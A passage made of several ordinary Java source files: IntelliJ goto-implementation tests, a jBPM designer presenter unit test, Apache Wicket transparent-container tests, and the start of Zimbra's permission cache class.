" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(2, impls.length);
}
public void testFilterOutImpossibleVariants() {
PsiFile file = myFixture.addFileToProject("Foo.java", "interface A {\n" +
" void save();\n" +
"}\n" +
"interface B extends A {\n" +
" void foo();\n" +
"}\n" +
"class X implements B {\n" +
" public void foo() { }\n" +
" public void save(){}\n" +
"}\n" +
"class Y implements A {\n" +
" public void save(){}\n" +
"}\n" +
"class App {\n" +
" private B b;\n" +
" private void some() {\n" +
" b.sa<caret>ve();\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(1, impls.length);
final PsiElement method = impls[0];
assertTrue(method instanceof PsiMethod);
final PsiClass aClass = ((PsiMethod)method).getContainingClass();
assertNotNull(aClass);
assertEquals("X", aClass.getName());
}
public void testImplicitInheritance() {
PsiFile file = myFixture.addFileToProject("Foo.java", "interface PackContainer {\n" +
" void foo();\n" +
"}\n" +
"interface PsiPackage extends PackContainer {}\n" +
"class PsiPackageBase implements PackContainer {\n" +
" public void foo() {}\n" +
"}\n" +
"class PsiPackageImpl extends PsiPackageBase implements PsiPackage {}\n" +
"\n" +
"class Foo {\n" +
" class Bar {\n" +
" void bar(PsiPackage i) {\n" +
" i.fo<caret>o();\n" +
" }\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(1, impls.length);
final PsiElement method = impls[0];
assertTrue(method instanceof PsiMethod);
final PsiClass aClass = ((PsiMethod)method).getContainingClass();
assertNotNull(aClass);
assertEquals("PsiPackageBase", aClass.getName());
}
public void testMethodReferences() {
PsiFile file = myFixture.addFileToProject("Foo.java", "interface I {void f();}\n" +
"class A implements I { public void f(){}}\n" +
"class B implements I { public void f(){}}\n" +
"class C {\n" +
" void foo(java.util.List<I> l) {l.stream().forEach(I::<caret>f);}" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(2, impls.length);
// target are non-deterministic now
Arrays.sort(impls, (o1, o2) -> {
String name1 = ((PsiMethod)o1).getContainingClass().getName();
String name2 = ((PsiMethod)o2).getContainingClass().getName();
return StringUtil.compare(name1, name2, false);
});
final PsiElement method = impls[0];
assertTrue(method instanceof PsiMethod);
final PsiClass aClass = ((PsiMethod)method).getContainingClass();
assertNotNull(aClass);
assertEquals("A", aClass.getName());
}
public void testMethodImplementationsOnTypeVariable() throws Exception {
PsiFile file = myFixture.addFileToProject("Foo.java", "interface I {}\n" +
"interface Im {\n" +
" void m();\n" +
"}\n" +
"class Im1 implements Im {\n" +
" public void m() {}\n" +
"}\n" +
"class Im2 implements Im {\n" +
" public void m() {}\n" +
"}\n" +
"class JavaClass<T extends K, K extends I & Im> {\n" +
" void a(T t){\n" +
" t.<caret>m();\n" +
" }\n" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
PsiElement[] targets = getTargets(file);
assertSize(2, targets);
}
public void testStaticMethodReference() {
PsiFile file = myFixture.addFileToProject("Foo.java",
"class C {\n" +
" static void a(){}\n" +
" {a<caret>();}" +
"}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
final PsiElement[] impls = getTargets(file);
assertEquals(1, impls.length);
}
public void testPrivateClassInheritors() {
PsiFile file = myFixture.addFileToProject("Foo.java",
"class C {\n" +
" private static class Pr<caret>ivate {}\n" +
" public static class Public extends Private {}" +
"}");
myFixture.addClass("class Inheritor extends C.Public {}");
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
assertSize(2, getTargets(file));
}
public void testPrivateClassInheritorsInJdkDecompiled() {
ModuleRootModificationUtil.setModuleSdk(myModule, IdeaTestUtil.getMockJdk18());
PsiClass aClass = myFixture.getJavaFacade().findClass("java.util.ResourceBundle.CacheKeyReference");
PsiFile file = aClass.getContainingFile();
myFixture.configureFromExistingVirtualFile(file.getVirtualFile());
myFixture.getEditor().getCaretModel().moveToOffset(aClass.getTextOffset());
assertSize(2, getTargets(file));
}
private PsiElement[] getTargets(PsiFile file) {
GotoTargetHandler.GotoData gotoData = CodeInsightTestUtil.gotoImplementation(myFixture.getEditor(), file);
assertNotNull(gotoData);
return gotoData.targets;
}
}
|
|
/*
* Copyright 2017 Red Hat, Inc. and/or its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jbpm.designer.client;
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;
import org.guvnor.common.services.project.client.context.WorkspaceProjectContext;
import org.guvnor.common.services.project.client.security.ProjectController;
import org.guvnor.common.services.project.model.WorkspaceProject;
import org.guvnor.common.services.shared.metadata.model.Overview;
import org.guvnor.messageconsole.client.console.widget.button.AlertsButtonMenuItemBuilder;
import org.jboss.errai.common.client.api.RemoteCallback;
import org.jbpm.designer.client.parameters.DesignerEditorParametersPublisher;
import org.junit.Before;
import org.junit.Test;
import org.junit.runner.RunWith;
import org.kie.workbench.common.widgets.client.menu.FileMenuBuilderImpl;
import org.kie.workbench.common.widgets.metadata.client.validation.AssetUpdateValidator;
import org.mockito.InjectMocks;
import org.mockito.Mock;
import org.mockito.Spy;
import org.mockito.runners.MockitoJUnitRunner;
import org.uberfire.backend.vfs.ObservablePath;
import org.uberfire.backend.vfs.Path;
import org.uberfire.client.promise.Promises;
import org.uberfire.ext.editor.commons.client.BaseEditorView;
import org.uberfire.ext.editor.commons.client.file.CommandWithFileNameAndCommitMessage;
import org.uberfire.ext.editor.commons.client.file.FileNameAndCommitMessage;
import org.uberfire.ext.editor.commons.client.file.popups.RenamePopUpPresenter;
import org.uberfire.ext.editor.commons.client.history.VersionRecordManager;
import org.uberfire.ext.editor.commons.client.menu.BasicFileMenuBuilder;
import org.uberfire.ext.editor.commons.client.validation.DefaultFileNameValidator;
import org.uberfire.ext.editor.commons.service.RenameService;
import org.uberfire.ext.widgets.common.client.callbacks.HasBusyIndicatorDefaultErrorCallback;
import org.uberfire.mocks.CallerMock;
import org.uberfire.mvp.Command;
import org.uberfire.promise.SyncPromises;
import org.uberfire.workbench.model.menu.MenuItem;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;
import static org.mockito.Mockito.any;
import static org.mockito.Mockito.doNothing;
import static org.mockito.Mockito.doReturn;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.never;
import static org.mockito.Mockito.spy;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
@RunWith(MockitoJUnitRunner.class)
public class DesignerPresenterTest {
@Mock
protected BasicFileMenuBuilder menuBuilder;
@Mock
protected VersionRecordManager versionRecordManager;
@Spy
@InjectMocks
protected FileMenuBuilderImpl fileMenuBuilder;
@Mock
protected ProjectController projectController;
@Mock
protected WorkspaceProjectContext workbenchContext;
@Mock
private RenameService renameService;
private CallerMock<RenameService> renameServiceCaller;
@Mock
private DesignerView view;
@Mock
private Overview overview;
@Mock
private DesignerEditorParametersPublisher designerEditorParametersPublisher;
@Mock
private RenamePopUpPresenter renamePopUpPresenter;
@Mock
private DefaultFileNameValidator fileNameValidator;
@Mock
private BaseEditorView baseView;
@Mock
private AlertsButtonMenuItemBuilder alertsButtonMenuItemBuilder;
private Promises promises;
@Mock
private MenuItem alertsButtonMenuItem;
@Spy
private Map<String, String> parameters = new HashMap<>();
private DesignerPresenter presenter;
@Before
public void setup() {
promises = new SyncPromises();
when(alertsButtonMenuItemBuilder.build()).thenReturn(alertsButtonMenuItem);
renameServiceCaller = new CallerMock<>(renameService);
presenter = spy(new DesignerPresenter(view) {
{
this.fileMenuBuilder = DesignerPresenterTest.this.fileMenuBuilder;
this.projectController = DesignerPresenterTest.this.projectController;
this.workbenchContext = DesignerPresenterTest.this.workbenchContext;
this.versionRecordManager = DesignerPresenterTest.this.versionRecordManager;
this.designerEditorParametersPublisher = DesignerPresenterTest.this.designerEditorParametersPublisher;
this.renamePopUpPresenter = DesignerPresenterTest.this.renamePopUpPresenter;
this.fileNameValidator = DesignerPresenterTest.this.fileNameValidator;
this.baseView = DesignerPresenterTest.this.baseView;
this.alertsButtonMenuItemBuilder = DesignerPresenterTest.this.alertsButtonMenuItemBuilder;
this.promises = DesignerPresenterTest.this.promises;
}
@Override
protected void resetEditorPages(final Overview overview) {
}
});
doReturn(Optional.of(mock(WorkspaceProject.class))).when(workbenchContext).getActiveWorkspaceProject();
}
@Test
public void testSetup() {
String id = "testId";
presenter.setup(parameters,
id,
overview);
verify(parameters,
times(1)).put("readonly",
"false");
verify(designerEditorParametersPublisher,
times(1)).publish(parameters);
verify(view,
times(1)).setup(id,
parameters);
assertEquals(1,
parameters.size());
assertTrue(parameters.containsKey("readonly"));
}
@Test
public void testMakeMenuBar() {
doReturn(Optional.of(mock(WorkspaceProject.class))).when(workbenchContext).getActiveWorkspaceProject();
doReturn(promises.resolve(true)).when(projectController).canUpdateProject(any());
presenter.makeMenuBar();
verify(fileMenuBuilder).addSave(any(MenuItem.class));
verify(fileMenuBuilder).addCopy(any(Path.class),
any(AssetUpdateValidator.class));
verify(fileMenuBuilder).addRename(any(Command.class));
verify(fileMenuBuilder).addDelete(any(Path.class),
any(AssetUpdateValidator.class));
verify(fileMenuBuilder).addNewTopLevelMenu(alertsButtonMenuItem);
}
@Test
public void testMakeMenuBarWithoutUpdateProjectPermission() {
doReturn(Optional.of(mock(WorkspaceProject.class))).when(workbenchContext).getActiveWorkspaceProject();
doReturn(promises.resolve(false)).when(projectController).canUpdateProject(any());
presenter.makeMenuBar();
verify(fileMenuBuilder,
never()).addSave(any(MenuItem.class));
verify(fileMenuBuilder,
never()).addCopy(any(Path.class),
any(AssetUpdateValidator.class));
verify(fileMenuBuilder,
never()).addRename(any(Command.class));
verify(fileMenuBuilder,
never()).addDelete(any(Path.class),
any(AssetUpdateValidator.class));
verify(fileMenuBuilder).addNewTopLevelMenu(alertsButtonMenuItem);
}
@Test
public void testGetSaveAndRenameWhenAssetIsDirty() {
final String title = "title";
final String message = "message";
final Command doSaveAndRename = mock(Command.class);
final Command doRename = mock(Command.class);
doReturn(true).when(presenter).isDirty();
doReturn(title).when(presenter).getPopupTitle();
doReturn(message).when(presenter).getMessage();
doReturn(doSaveAndRename).when(presenter).doSaveAndRename();
doReturn(doRename).when(presenter).doRename();
presenter.getSaveAndRename().execute();
verify(view).showYesNoCancelPopup(title, message, doSaveAndRename, doRename);
}
@Test
public void testGetSaveAndRenameWhenAssetIsNotDirty() {
final Command doRename = mock(Command.class);
doReturn(false).when(presenter).isDirty();
doReturn(doRename).when(presenter).doRename();
presenter.getSaveAndRename().execute();
verify(doRename).execute();
}
@Test
public void testIsDirtyWhenDesignerModelCanBeSaved() {
doReturn(true).when(view).canSaveDesignerModel();
assertFalse(presenter.isDirty());
}
@Test
public void testIsDirtyWhenDesignerModelCannotBeSaved() {
doReturn(false).when(view).canSaveDesignerModel();
assertTrue(presenter.isDirty());
}
@Test
public void testDoSaveAndRename() {
final Command command = mock(Command.class);
doReturn(command).when(presenter).doRename();
doNothing().when(presenter).save(any());
presenter.doSaveAndRename().execute();
verify(presenter).save(command);
}
@Test
public void testDoRename() {
doNothing().when(presenter).openRenamePopUp(any());
presenter.doRename().execute();
verify(presenter).openRenamePopUp(any());
}
@Test
public void testOpenRenamePopUp() {
final ObservablePath observablePath = mock(ObservablePath.class);
final CommandWithFileNameAndCommitMessage command = mock(CommandWithFileNameAndCommitMessage.class);
doReturn(command).when(presenter).makeRenameCommand();
presenter.openRenamePopUp(observablePath);
verify(renamePopUpPresenter).show(observablePath, fileNameValidator, command);
}
@Test
public void testMakeRenameCommand() {
final FileNameAndCommitMessage details = mock(FileNameAndCommitMessage.class);
final ObservablePath observablePath = mock(ObservablePath.class);
final RemoteCallback successCallback = mock(RemoteCallback.class);
final HasBusyIndicatorDefaultErrorCallback errorCallback = mock(HasBusyIndicatorDefaultErrorCallback.class);
final String newFileName = "newFileName";
final String message = "message";
doReturn(newFileName).when(details).getNewFileName();
doReturn(message).when(details).getCommitMessage();
doReturn(observablePath).when(versionRecordManager).getPathToLatest();
doReturn(renameServiceCaller).when(presenter).getRenameService();
doReturn(successCallback).when(presenter).getRenameSuccessCallback(any());
doReturn(errorCallback).when(presenter).getRenameErrorCallback(any());
presenter.makeRenameCommand().execute(details);
verify(renameService).rename(observablePath, newFileName, message);
}
}
|
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.wicket.markup.html;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.containsString;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertTrue;
import static org.junit.jupiter.api.Assertions.fail;
import org.apache.wicket.Component;
import org.apache.wicket.IPageManagerProvider;
import org.apache.wicket.MarkupContainer;
import org.apache.wicket.Page;
import org.apache.wicket.ajax.AjaxRequestTarget;
import org.apache.wicket.ajax.markup.html.AjaxLink;
import org.apache.wicket.core.util.lang.WicketObjects;
import org.apache.wicket.markup.IMarkupResourceStreamProvider;
import org.apache.wicket.markup.MarkupException;
import org.apache.wicket.markup.html.basic.Label;
import org.apache.wicket.markup.html.border.Border;
import org.apache.wicket.markup.html.internal.HtmlHeaderContainer;
import org.apache.wicket.markup.html.panel.Fragment;
import org.apache.wicket.mock.MockPageManager;
import org.apache.wicket.page.IManageablePage;
import org.apache.wicket.page.IPageManager;
import org.apache.wicket.pageStore.IPageContext;
import org.apache.wicket.request.mapper.parameter.PageParameters;
import org.apache.wicket.util.resource.IResourceStream;
import org.apache.wicket.util.resource.StringResourceStream;
import org.apache.wicket.util.tester.WicketTestCase;
import org.apache.wicket.util.tester.WicketTester;
import org.junit.jupiter.api.Test;
/**
* @author Pedro Santos
*/
public class TransparentWebMarkupContainerTest extends WicketTestCase
{
/**
* WICKET-3512
*
* @throws Exception
*/
@Test
void markupInheritanceResolver() throws Exception
{
executeTest(MarkupInheritanceResolverTestPage3.class,
"MarkupInheritanceResolverTestPage_expected.html");
}
/**
*
*/
@Test
void unableToFindComponents()
{
try
{
tester.startPage(TestPage.class);
fail();
}
catch (MarkupException e)
{
assertTrue(e.getMessage().contains("Unable to find component with id 'c1'"), e.getMessage());
}
}
/**
* Test if the render is OK even if users define its own component with the same id
* WicketTagIdentifier is generation for internal components.
*/
@Test
void usingGeneratedWicketIdAreSafe1()
{
tester.startPage(TestPage2.class);
assertTrue(tester.getLastResponseAsString().contains("test_message"));
}
/**
* Same test in different scenario
*/
@Test
void usingGeneratedWicketIdAreSafe2()
{
tester.startPage(TestPage3.class);
String expected = tester.getApplication()
.getResourceSettings()
.getLocalizer()
.getString("null", null);
assertTrue(tester.getLastResponseAsString().contains(expected));
}
/**
* Test case for <a href="https://issues.apache.org/jira/browse/WICKET-3719">WICKET-3719</a>
*/
@Test
void ajaxUpdate()
{
WicketTester wicketTester = new WicketTester()
{
@Override
protected IPageManagerProvider newTestPageManagerProvider()
{
return new IPageManagerProvider()
{
@Override
public IPageManager get()
{
return new MockPageManager()
{
@Override
public void touchPage(IManageablePage page)
{
page = WicketObjects.cloneObject(page);
super.touchPage(page);
}
};
}
};
}
};
wicketTester.startPage(TransparentWithAjaxUpdatePage.class);
wicketTester.clickLink("link", true);
wicketTester.destroy();
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by Wicket's
* insertion of a TransparentWebMarkupContainer automatically due to a {@code src} attribute
* that might need rewriting.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow()
{
tester.startPage(SingleNestedTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(SingleNestedTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by having two
* TransparentWebMarkupContainers nested and trying to update a label that was added to the
* outer TWMC.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow2()
{
tester.startPage(DoubleNestedTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(DoubleNestedTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by having two
* TransparentWebMarkupContainers nested, and where a TWMC exist inside a sibling web markup
* container and trying to update a label that was added to the outer TWMC.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow3()
{
tester.startPage(DoubleNestedTransparentContainerWithSiblingTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(DoubleNestedTransparentContainerWithSiblingTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by having
* introduce automatic transparent containers inside some link components due to a
* {@code <img src="">} tag inside the link tags, and trying to update a label that was added to
* the outer TWMC.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow4()
{
tester.startPage(TransparentContainerWithAutoTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(TransparentContainerWithAutoTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* Tests the WICKET-5898 issue of triggering a StackOverflowError when a component inside nested
* TransparentWebMarkupContainers is updated. This particular test case is caused by having
* manually added transparent containers inside some link components, and trying to update a
* label that was added to the outer TWMC.
*/
@Test
void ajaxRequestForComponentInTransparentWebMarkupContainerShouldntCauseStackOverflow5()
{
tester.startPage(TransparentContainerWithManualTransparentContainerPage.class);
// the page renders normally using normal web requests
tester.assertRenderedPage(TransparentContainerWithManualTransparentContainerPage.class);
// without WICKET-5898 fixed the statement below causes a StackOverflowError
tester.clickLink("link", true);
tester.assertComponentOnAjaxResponse("label");
}
/**
* https://issues.apache.org/jira/browse/WICKET-5941
*
* Headers not rendered for components inside TransparentWebMarkupContainer on ajax update
*/
@Test
void updateAjaxUpdateOfTransparentContainer() throws Exception
{
TestEmbeddedAjaxComponet page = new TestEmbeddedAjaxComponet();
tester.startPage(page);
assertEquals(2, page.renderHeadCount);
tester.clickLink("container:updateTransparentContainer", true);
assertEquals(4, page.renderHeadCount);
}
@Test
void updateAjaxUpdateOfContainerWithTransparentContainer() throws Exception
{
TestEmbeddedAjaxComponet page = new TestEmbeddedAjaxComponet();
tester.startPage(page);
assertEquals(2, page.renderHeadCount);
tester.clickLink("container:updateContainer", true);
assertEquals(4, page.renderHeadCount);
}
@Test
void nestedTransparentContainer() throws Exception
{
tester.startPage(TestEmbeddedTransparentMarkupContainer.class);
tester.assertRenderedPage(TestEmbeddedTransparentMarkupContainer.class);
final Page page = tester.getLastRenderedPage();
final Component label = page.get("label");
assertEquals(TestEmbeddedTransparentMarkupContainer.LABEL_MARKUP,
label.getMarkup().toString(true));
}
/**
* https://issues.apache.org/jira/browse/WICKET-6219
*/
@Test
void shouldAllowAFragmentIdConflictingToASibilingTagWicketId() throws Exception
{
tester.startPage(SubPageWithAFragment.class);
assertThat(tester.getLastResponseAsString(), containsString("content"));
}
/** */
public static class TestPage extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
/** */
public TestPage()
{
add(new TestBorder("border"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"border\">" + //
" <div wicket:id=\"c1\"></div>" + // component is only at the markup
" </div>" + //
"</body></html>");
}
}
private static class TestBorder extends Border implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
private TestBorder(String id)
{
super(id);
addToBorder(new Label("c1", "some border title"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream(
"<wicket:border><div wicket:id=\"c1\"></div><wicket:body /></wicket:border>");
}
}
/** */
public static class TestPage2 extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
/** */
public TestPage2()
{
add(new Label("_wicket_enclosure"));
add(new TransparentWebMarkupContainer("container").add(new Label("msg", "test_message")));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"_wicket_enclosure\"></div>" + //
" <div wicket:id=\"container\">" + //
" <wicket:enclosure child=\"msg\">" + //
" <span wicket:id=\"msg\"></span>" + //
" </wicket:enclosure>" + //
" </div>" + //
"</body></html>");
}
}
/** */
public static class TestPage3 extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
/** */
public TestPage3()
{
add(new WebComponent("_wicket_message"));
add(new TransparentWebMarkupContainer("container"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"_wicket_message\"></div>" + //
" <div wicket:id=\"container\">" + //
" <wicket:message key=\"null\" />" + //
" </div>" + //
"</body></html>");
}
}
public static class TestEmbeddedAjaxComponet extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
int renderHeadCount = 0;
/** */
TestEmbeddedAjaxComponet()
{
final WebMarkupContainer container = new WebMarkupContainer("container");
container.setOutputMarkupId(true);
add(container);
final Component transparentContainer = new TransparentWebMarkupContainer("transparentContainer").setOutputMarkupId(true);
container.add(transparentContainer);
container.add(new AjaxLink<Void>("updateContainer"){
@Override
public void internalRenderHead(HtmlHeaderContainer container)
{
super.internalRenderHead(container);
renderHeadCount++;
}
@Override
public void onClick(AjaxRequestTarget target)
{
target.add(container);
}
});
container.add(new AjaxLink<Void>("updateTransparentContainer"){
@Override
public void internalRenderHead(HtmlHeaderContainer container)
{
super.internalRenderHead(container);
renderHeadCount++;
}
@Override
public void onClick(AjaxRequestTarget target)
{
target.add(transparentContainer);
}
});
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"container\">" + //
" <div wicket:id=\"transparentContainer\">" + //
" <a wicket:id=\"updateContainer\"></a>" + //
" <a wicket:id=\"updateTransparentContainer\"></a>" + //
" </div>" + //
" </div>" + //
"</body></html>");
}
}
public static class TestEmbeddedTransparentMarkupContainer extends WebPage implements IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
static final String LABEL_MARKUP = "<span wicket:id=\"label\"></span>";
/** */
public TestEmbeddedTransparentMarkupContainer()
{
add(new TransparentWebMarkupContainer("outer"));
add(new TransparentWebMarkupContainer("inner"));
add(new Label("label"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"outer\">" + //
" <div wicket:id=\"inner\">" + //
" " + LABEL_MARKUP + //
" </div>" + //
" </div>" + //
"</body></html>");
}
}
public static class PageWithAChildInsideATransparentContainer extends WebPage
implements
IMarkupResourceStreamProvider
{
private static final long serialVersionUID = 1L;
public PageWithAChildInsideATransparentContainer(PageParameters parameters)
{
super(parameters);
add(new TransparentWebMarkupContainer("wrapper"));
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
return new StringResourceStream("" + //
"<html><body>" + //
" <div wicket:id=\"wrapper\">" + //
" <wicket:child/>" + //
" </div>" + //
"</body></html>");
}
}
public static class SubPageWithAFragment extends PageWithAChildInsideATransparentContainer
{
private static final long serialVersionUID = 1L;
public SubPageWithAFragment(PageParameters parameters)
{
super(parameters);
Fragment fragment = new Fragment("header", "header", this);
add(fragment);
}
@Override
public IResourceStream getMarkupResourceStream(MarkupContainer container,
Class<?> containerClass)
{
if (PageWithAChildInsideATransparentContainer.class.equals(containerClass))
return super.getMarkupResourceStream(container, containerClass);
return new StringResourceStream("" + //
"<html><body>" + //
"<wicket:extend>" + //
" <div wicket:id=\"header\"></div>" + //
" <wicket:fragment wicket:id=\"header\">content</wicket:fragment>" + //
"</wicket:extend>" + //
"</body></html>");
}
}
}
|
|
/*
* ***** BEGIN LICENSE BLOCK *****
* Zimbra Collaboration Suite Server
* Copyright (C) 2010 Zimbra, Inc.
*
* The contents of this file are subject to the Zimbra Public License
* Version 1.3 ("License"); you may not use this file except in
* compliance with the License. You may obtain a copy of the License at
* http://www.zimbra.com/license.
*
* Software distributed under the License is distributed on an "AS IS"
* basis, WITHOUT WARRANTY OF ANY KIND, either express or implied.
* ***** END LICENSE BLOCK *****
*/
package com.zimbra.cs.account.accesscontrol;
import com.zimbra.common.localconfig.LC;
import com.zimbra.common.service.ServiceException;
import com.zimbra.common.util.ZimbraLog;
import com.zimbra.cs.account.Account;
import com.zimbra.cs.account.Entry;
import com.zimbra.cs.account.GuestAccount;
import com.zimbra.cs.account.Provisioning;
import com.zimbra.cs.account.accesscontrol.Rights.Admin;
import com.zimbra.soap.admin.type.CacheEntryType;
public class PermissionCache {
private static boolean cacheEnabled = LC.acl_cache_enabled.booleanValue();
enum CachedPermission {
NOT_CACHED(null, (short)0),
NO_MATCHING_ACL(null, PermCacheManager.CachedPerms.MASK_NO_MATCHING_ACL),
ALLOWED(Boolean.TRUE, PermCacheManager.CachedPerms.MASK_ALLOWED),
DENIED(Boolean.FALSE, PermCacheManager.CachedPerms.MASK_DENIED);
private Boolean result;
private short cacheMask;
private CachedPermission(Boolean result, short cacheMask) {
this.result = result;
this.cacheMask = cacheMask;
}
Boolean getResult() {
assert(this != NOT_CACHED);
return result;
}
short getCacheMask() {
return cacheMask;
}
}
public static void invalidateCache() {
PermCacheManager.getInstance().invalidateCache();
}
/**
* Invoked from the milter server/JVM.
*
* In addition to just invalidating the permission cache, we also need to
* invalidate account, aclgroup, domain, and globalgrant LDAP entry caches
* where the ACL is cached.
* On mailbox server those caches are automatically updated when the
* modification (grant, revoke, member changes, group/account/domain
* creation/deletion etc) happens.
*/
public static void invalidateAllCache() {
// clear all LDAP entry caches
Provisioning prov = Provisioning.getInstance();
try {
prov.flushCache(CacheEntryType.all, null);
} catch (ServiceException e) {
ZimbraLog.acl.warn("unable to flush cache", e);
}
// clear the permission cache
invalidateCache();
}
public static void invalidateCache(Entry target) {
PermCacheManager.getInstance().invalidateCache(target);
}
public static double getHitRate() {
return PermCacheManager.getInstance().getHitRate();
}
static CachedPermission cacheGet(Account grantee, Entry target, Right rightNeeded, boolean canDelegateNeeded) {
if (!cacheEnabled) {
return CachedPermission.NOT_CACHED;
}
String cacheKey = buildCacheKey(grantee, rightNeeded, canDelegateNeeded);
if (cacheKey == null) {
// not cachable
return CachedPermission.NOT_CACHED;
}
CachedPermission perm = PermCacheManager.getInstance().get(target, cacheKey, rightNeeded);
if (ZimbraLog.acl.isDebugEnabled()) {
ZimbraLog.acl.debug("PermissionCache get: " + perm.toString() +
" (target=" + target.getLabel() + ", grantee=" + grantee.getName() +
", right=" + rightNeeded.getName() + ", canDelegateNeeded=" + canDelegateNeeded + ")");
}
return perm;
}
static void cachePut(Account grantee, Entry target, Right rightNeeded, boolean canDelegateNeeded,
Boolean allowed) {
if (!cacheEnabled) {
return;
}
String cacheKey = buildCacheKey(grantee, rightNeeded, canDelegateNeeded);
if (cacheKey == null) {
return; // not cacheable
}
CachedPermission perm = (allowed == null) ? CachedPermission.NO_MATCHING_ACL :
allowed.booleanValue() ? CachedPermission.ALLOWED : CachedPermission.DENIED;
PermCacheManager.getInstance().put(target, cacheKey, rightNeeded, perm);
if (ZimbraLog.acl.isDebugEnabled()) {
ZimbraLog.acl.debug("PermissionCache put: " + perm.toString() +
" (target=" + target.getLabel() + ", grantee=" + grantee.getName() +
", right=" + rightNeeded.getName() + ", canDelegateNeeded=" + canDelegateNeeded + ")");
}
}
/*
* returns cache key for entries on the map cached on the entry
* cache key is in the format of
*
* <GRANTEE-IDENTIFIER><ADMIN-FLAG><CAN-DELEDATE-NEEDED>
*
* GRANTEE-IDENTIFIER := <GUEST-ACCOUNT-BY-USER-PASS>|<GUEST-ACCOUNT-BY-ACCESSKEY>|<zimra-account-id>
*
* GUEST-ACCOUNT-BY-USER-PASS := <user-pass-digest>G
*
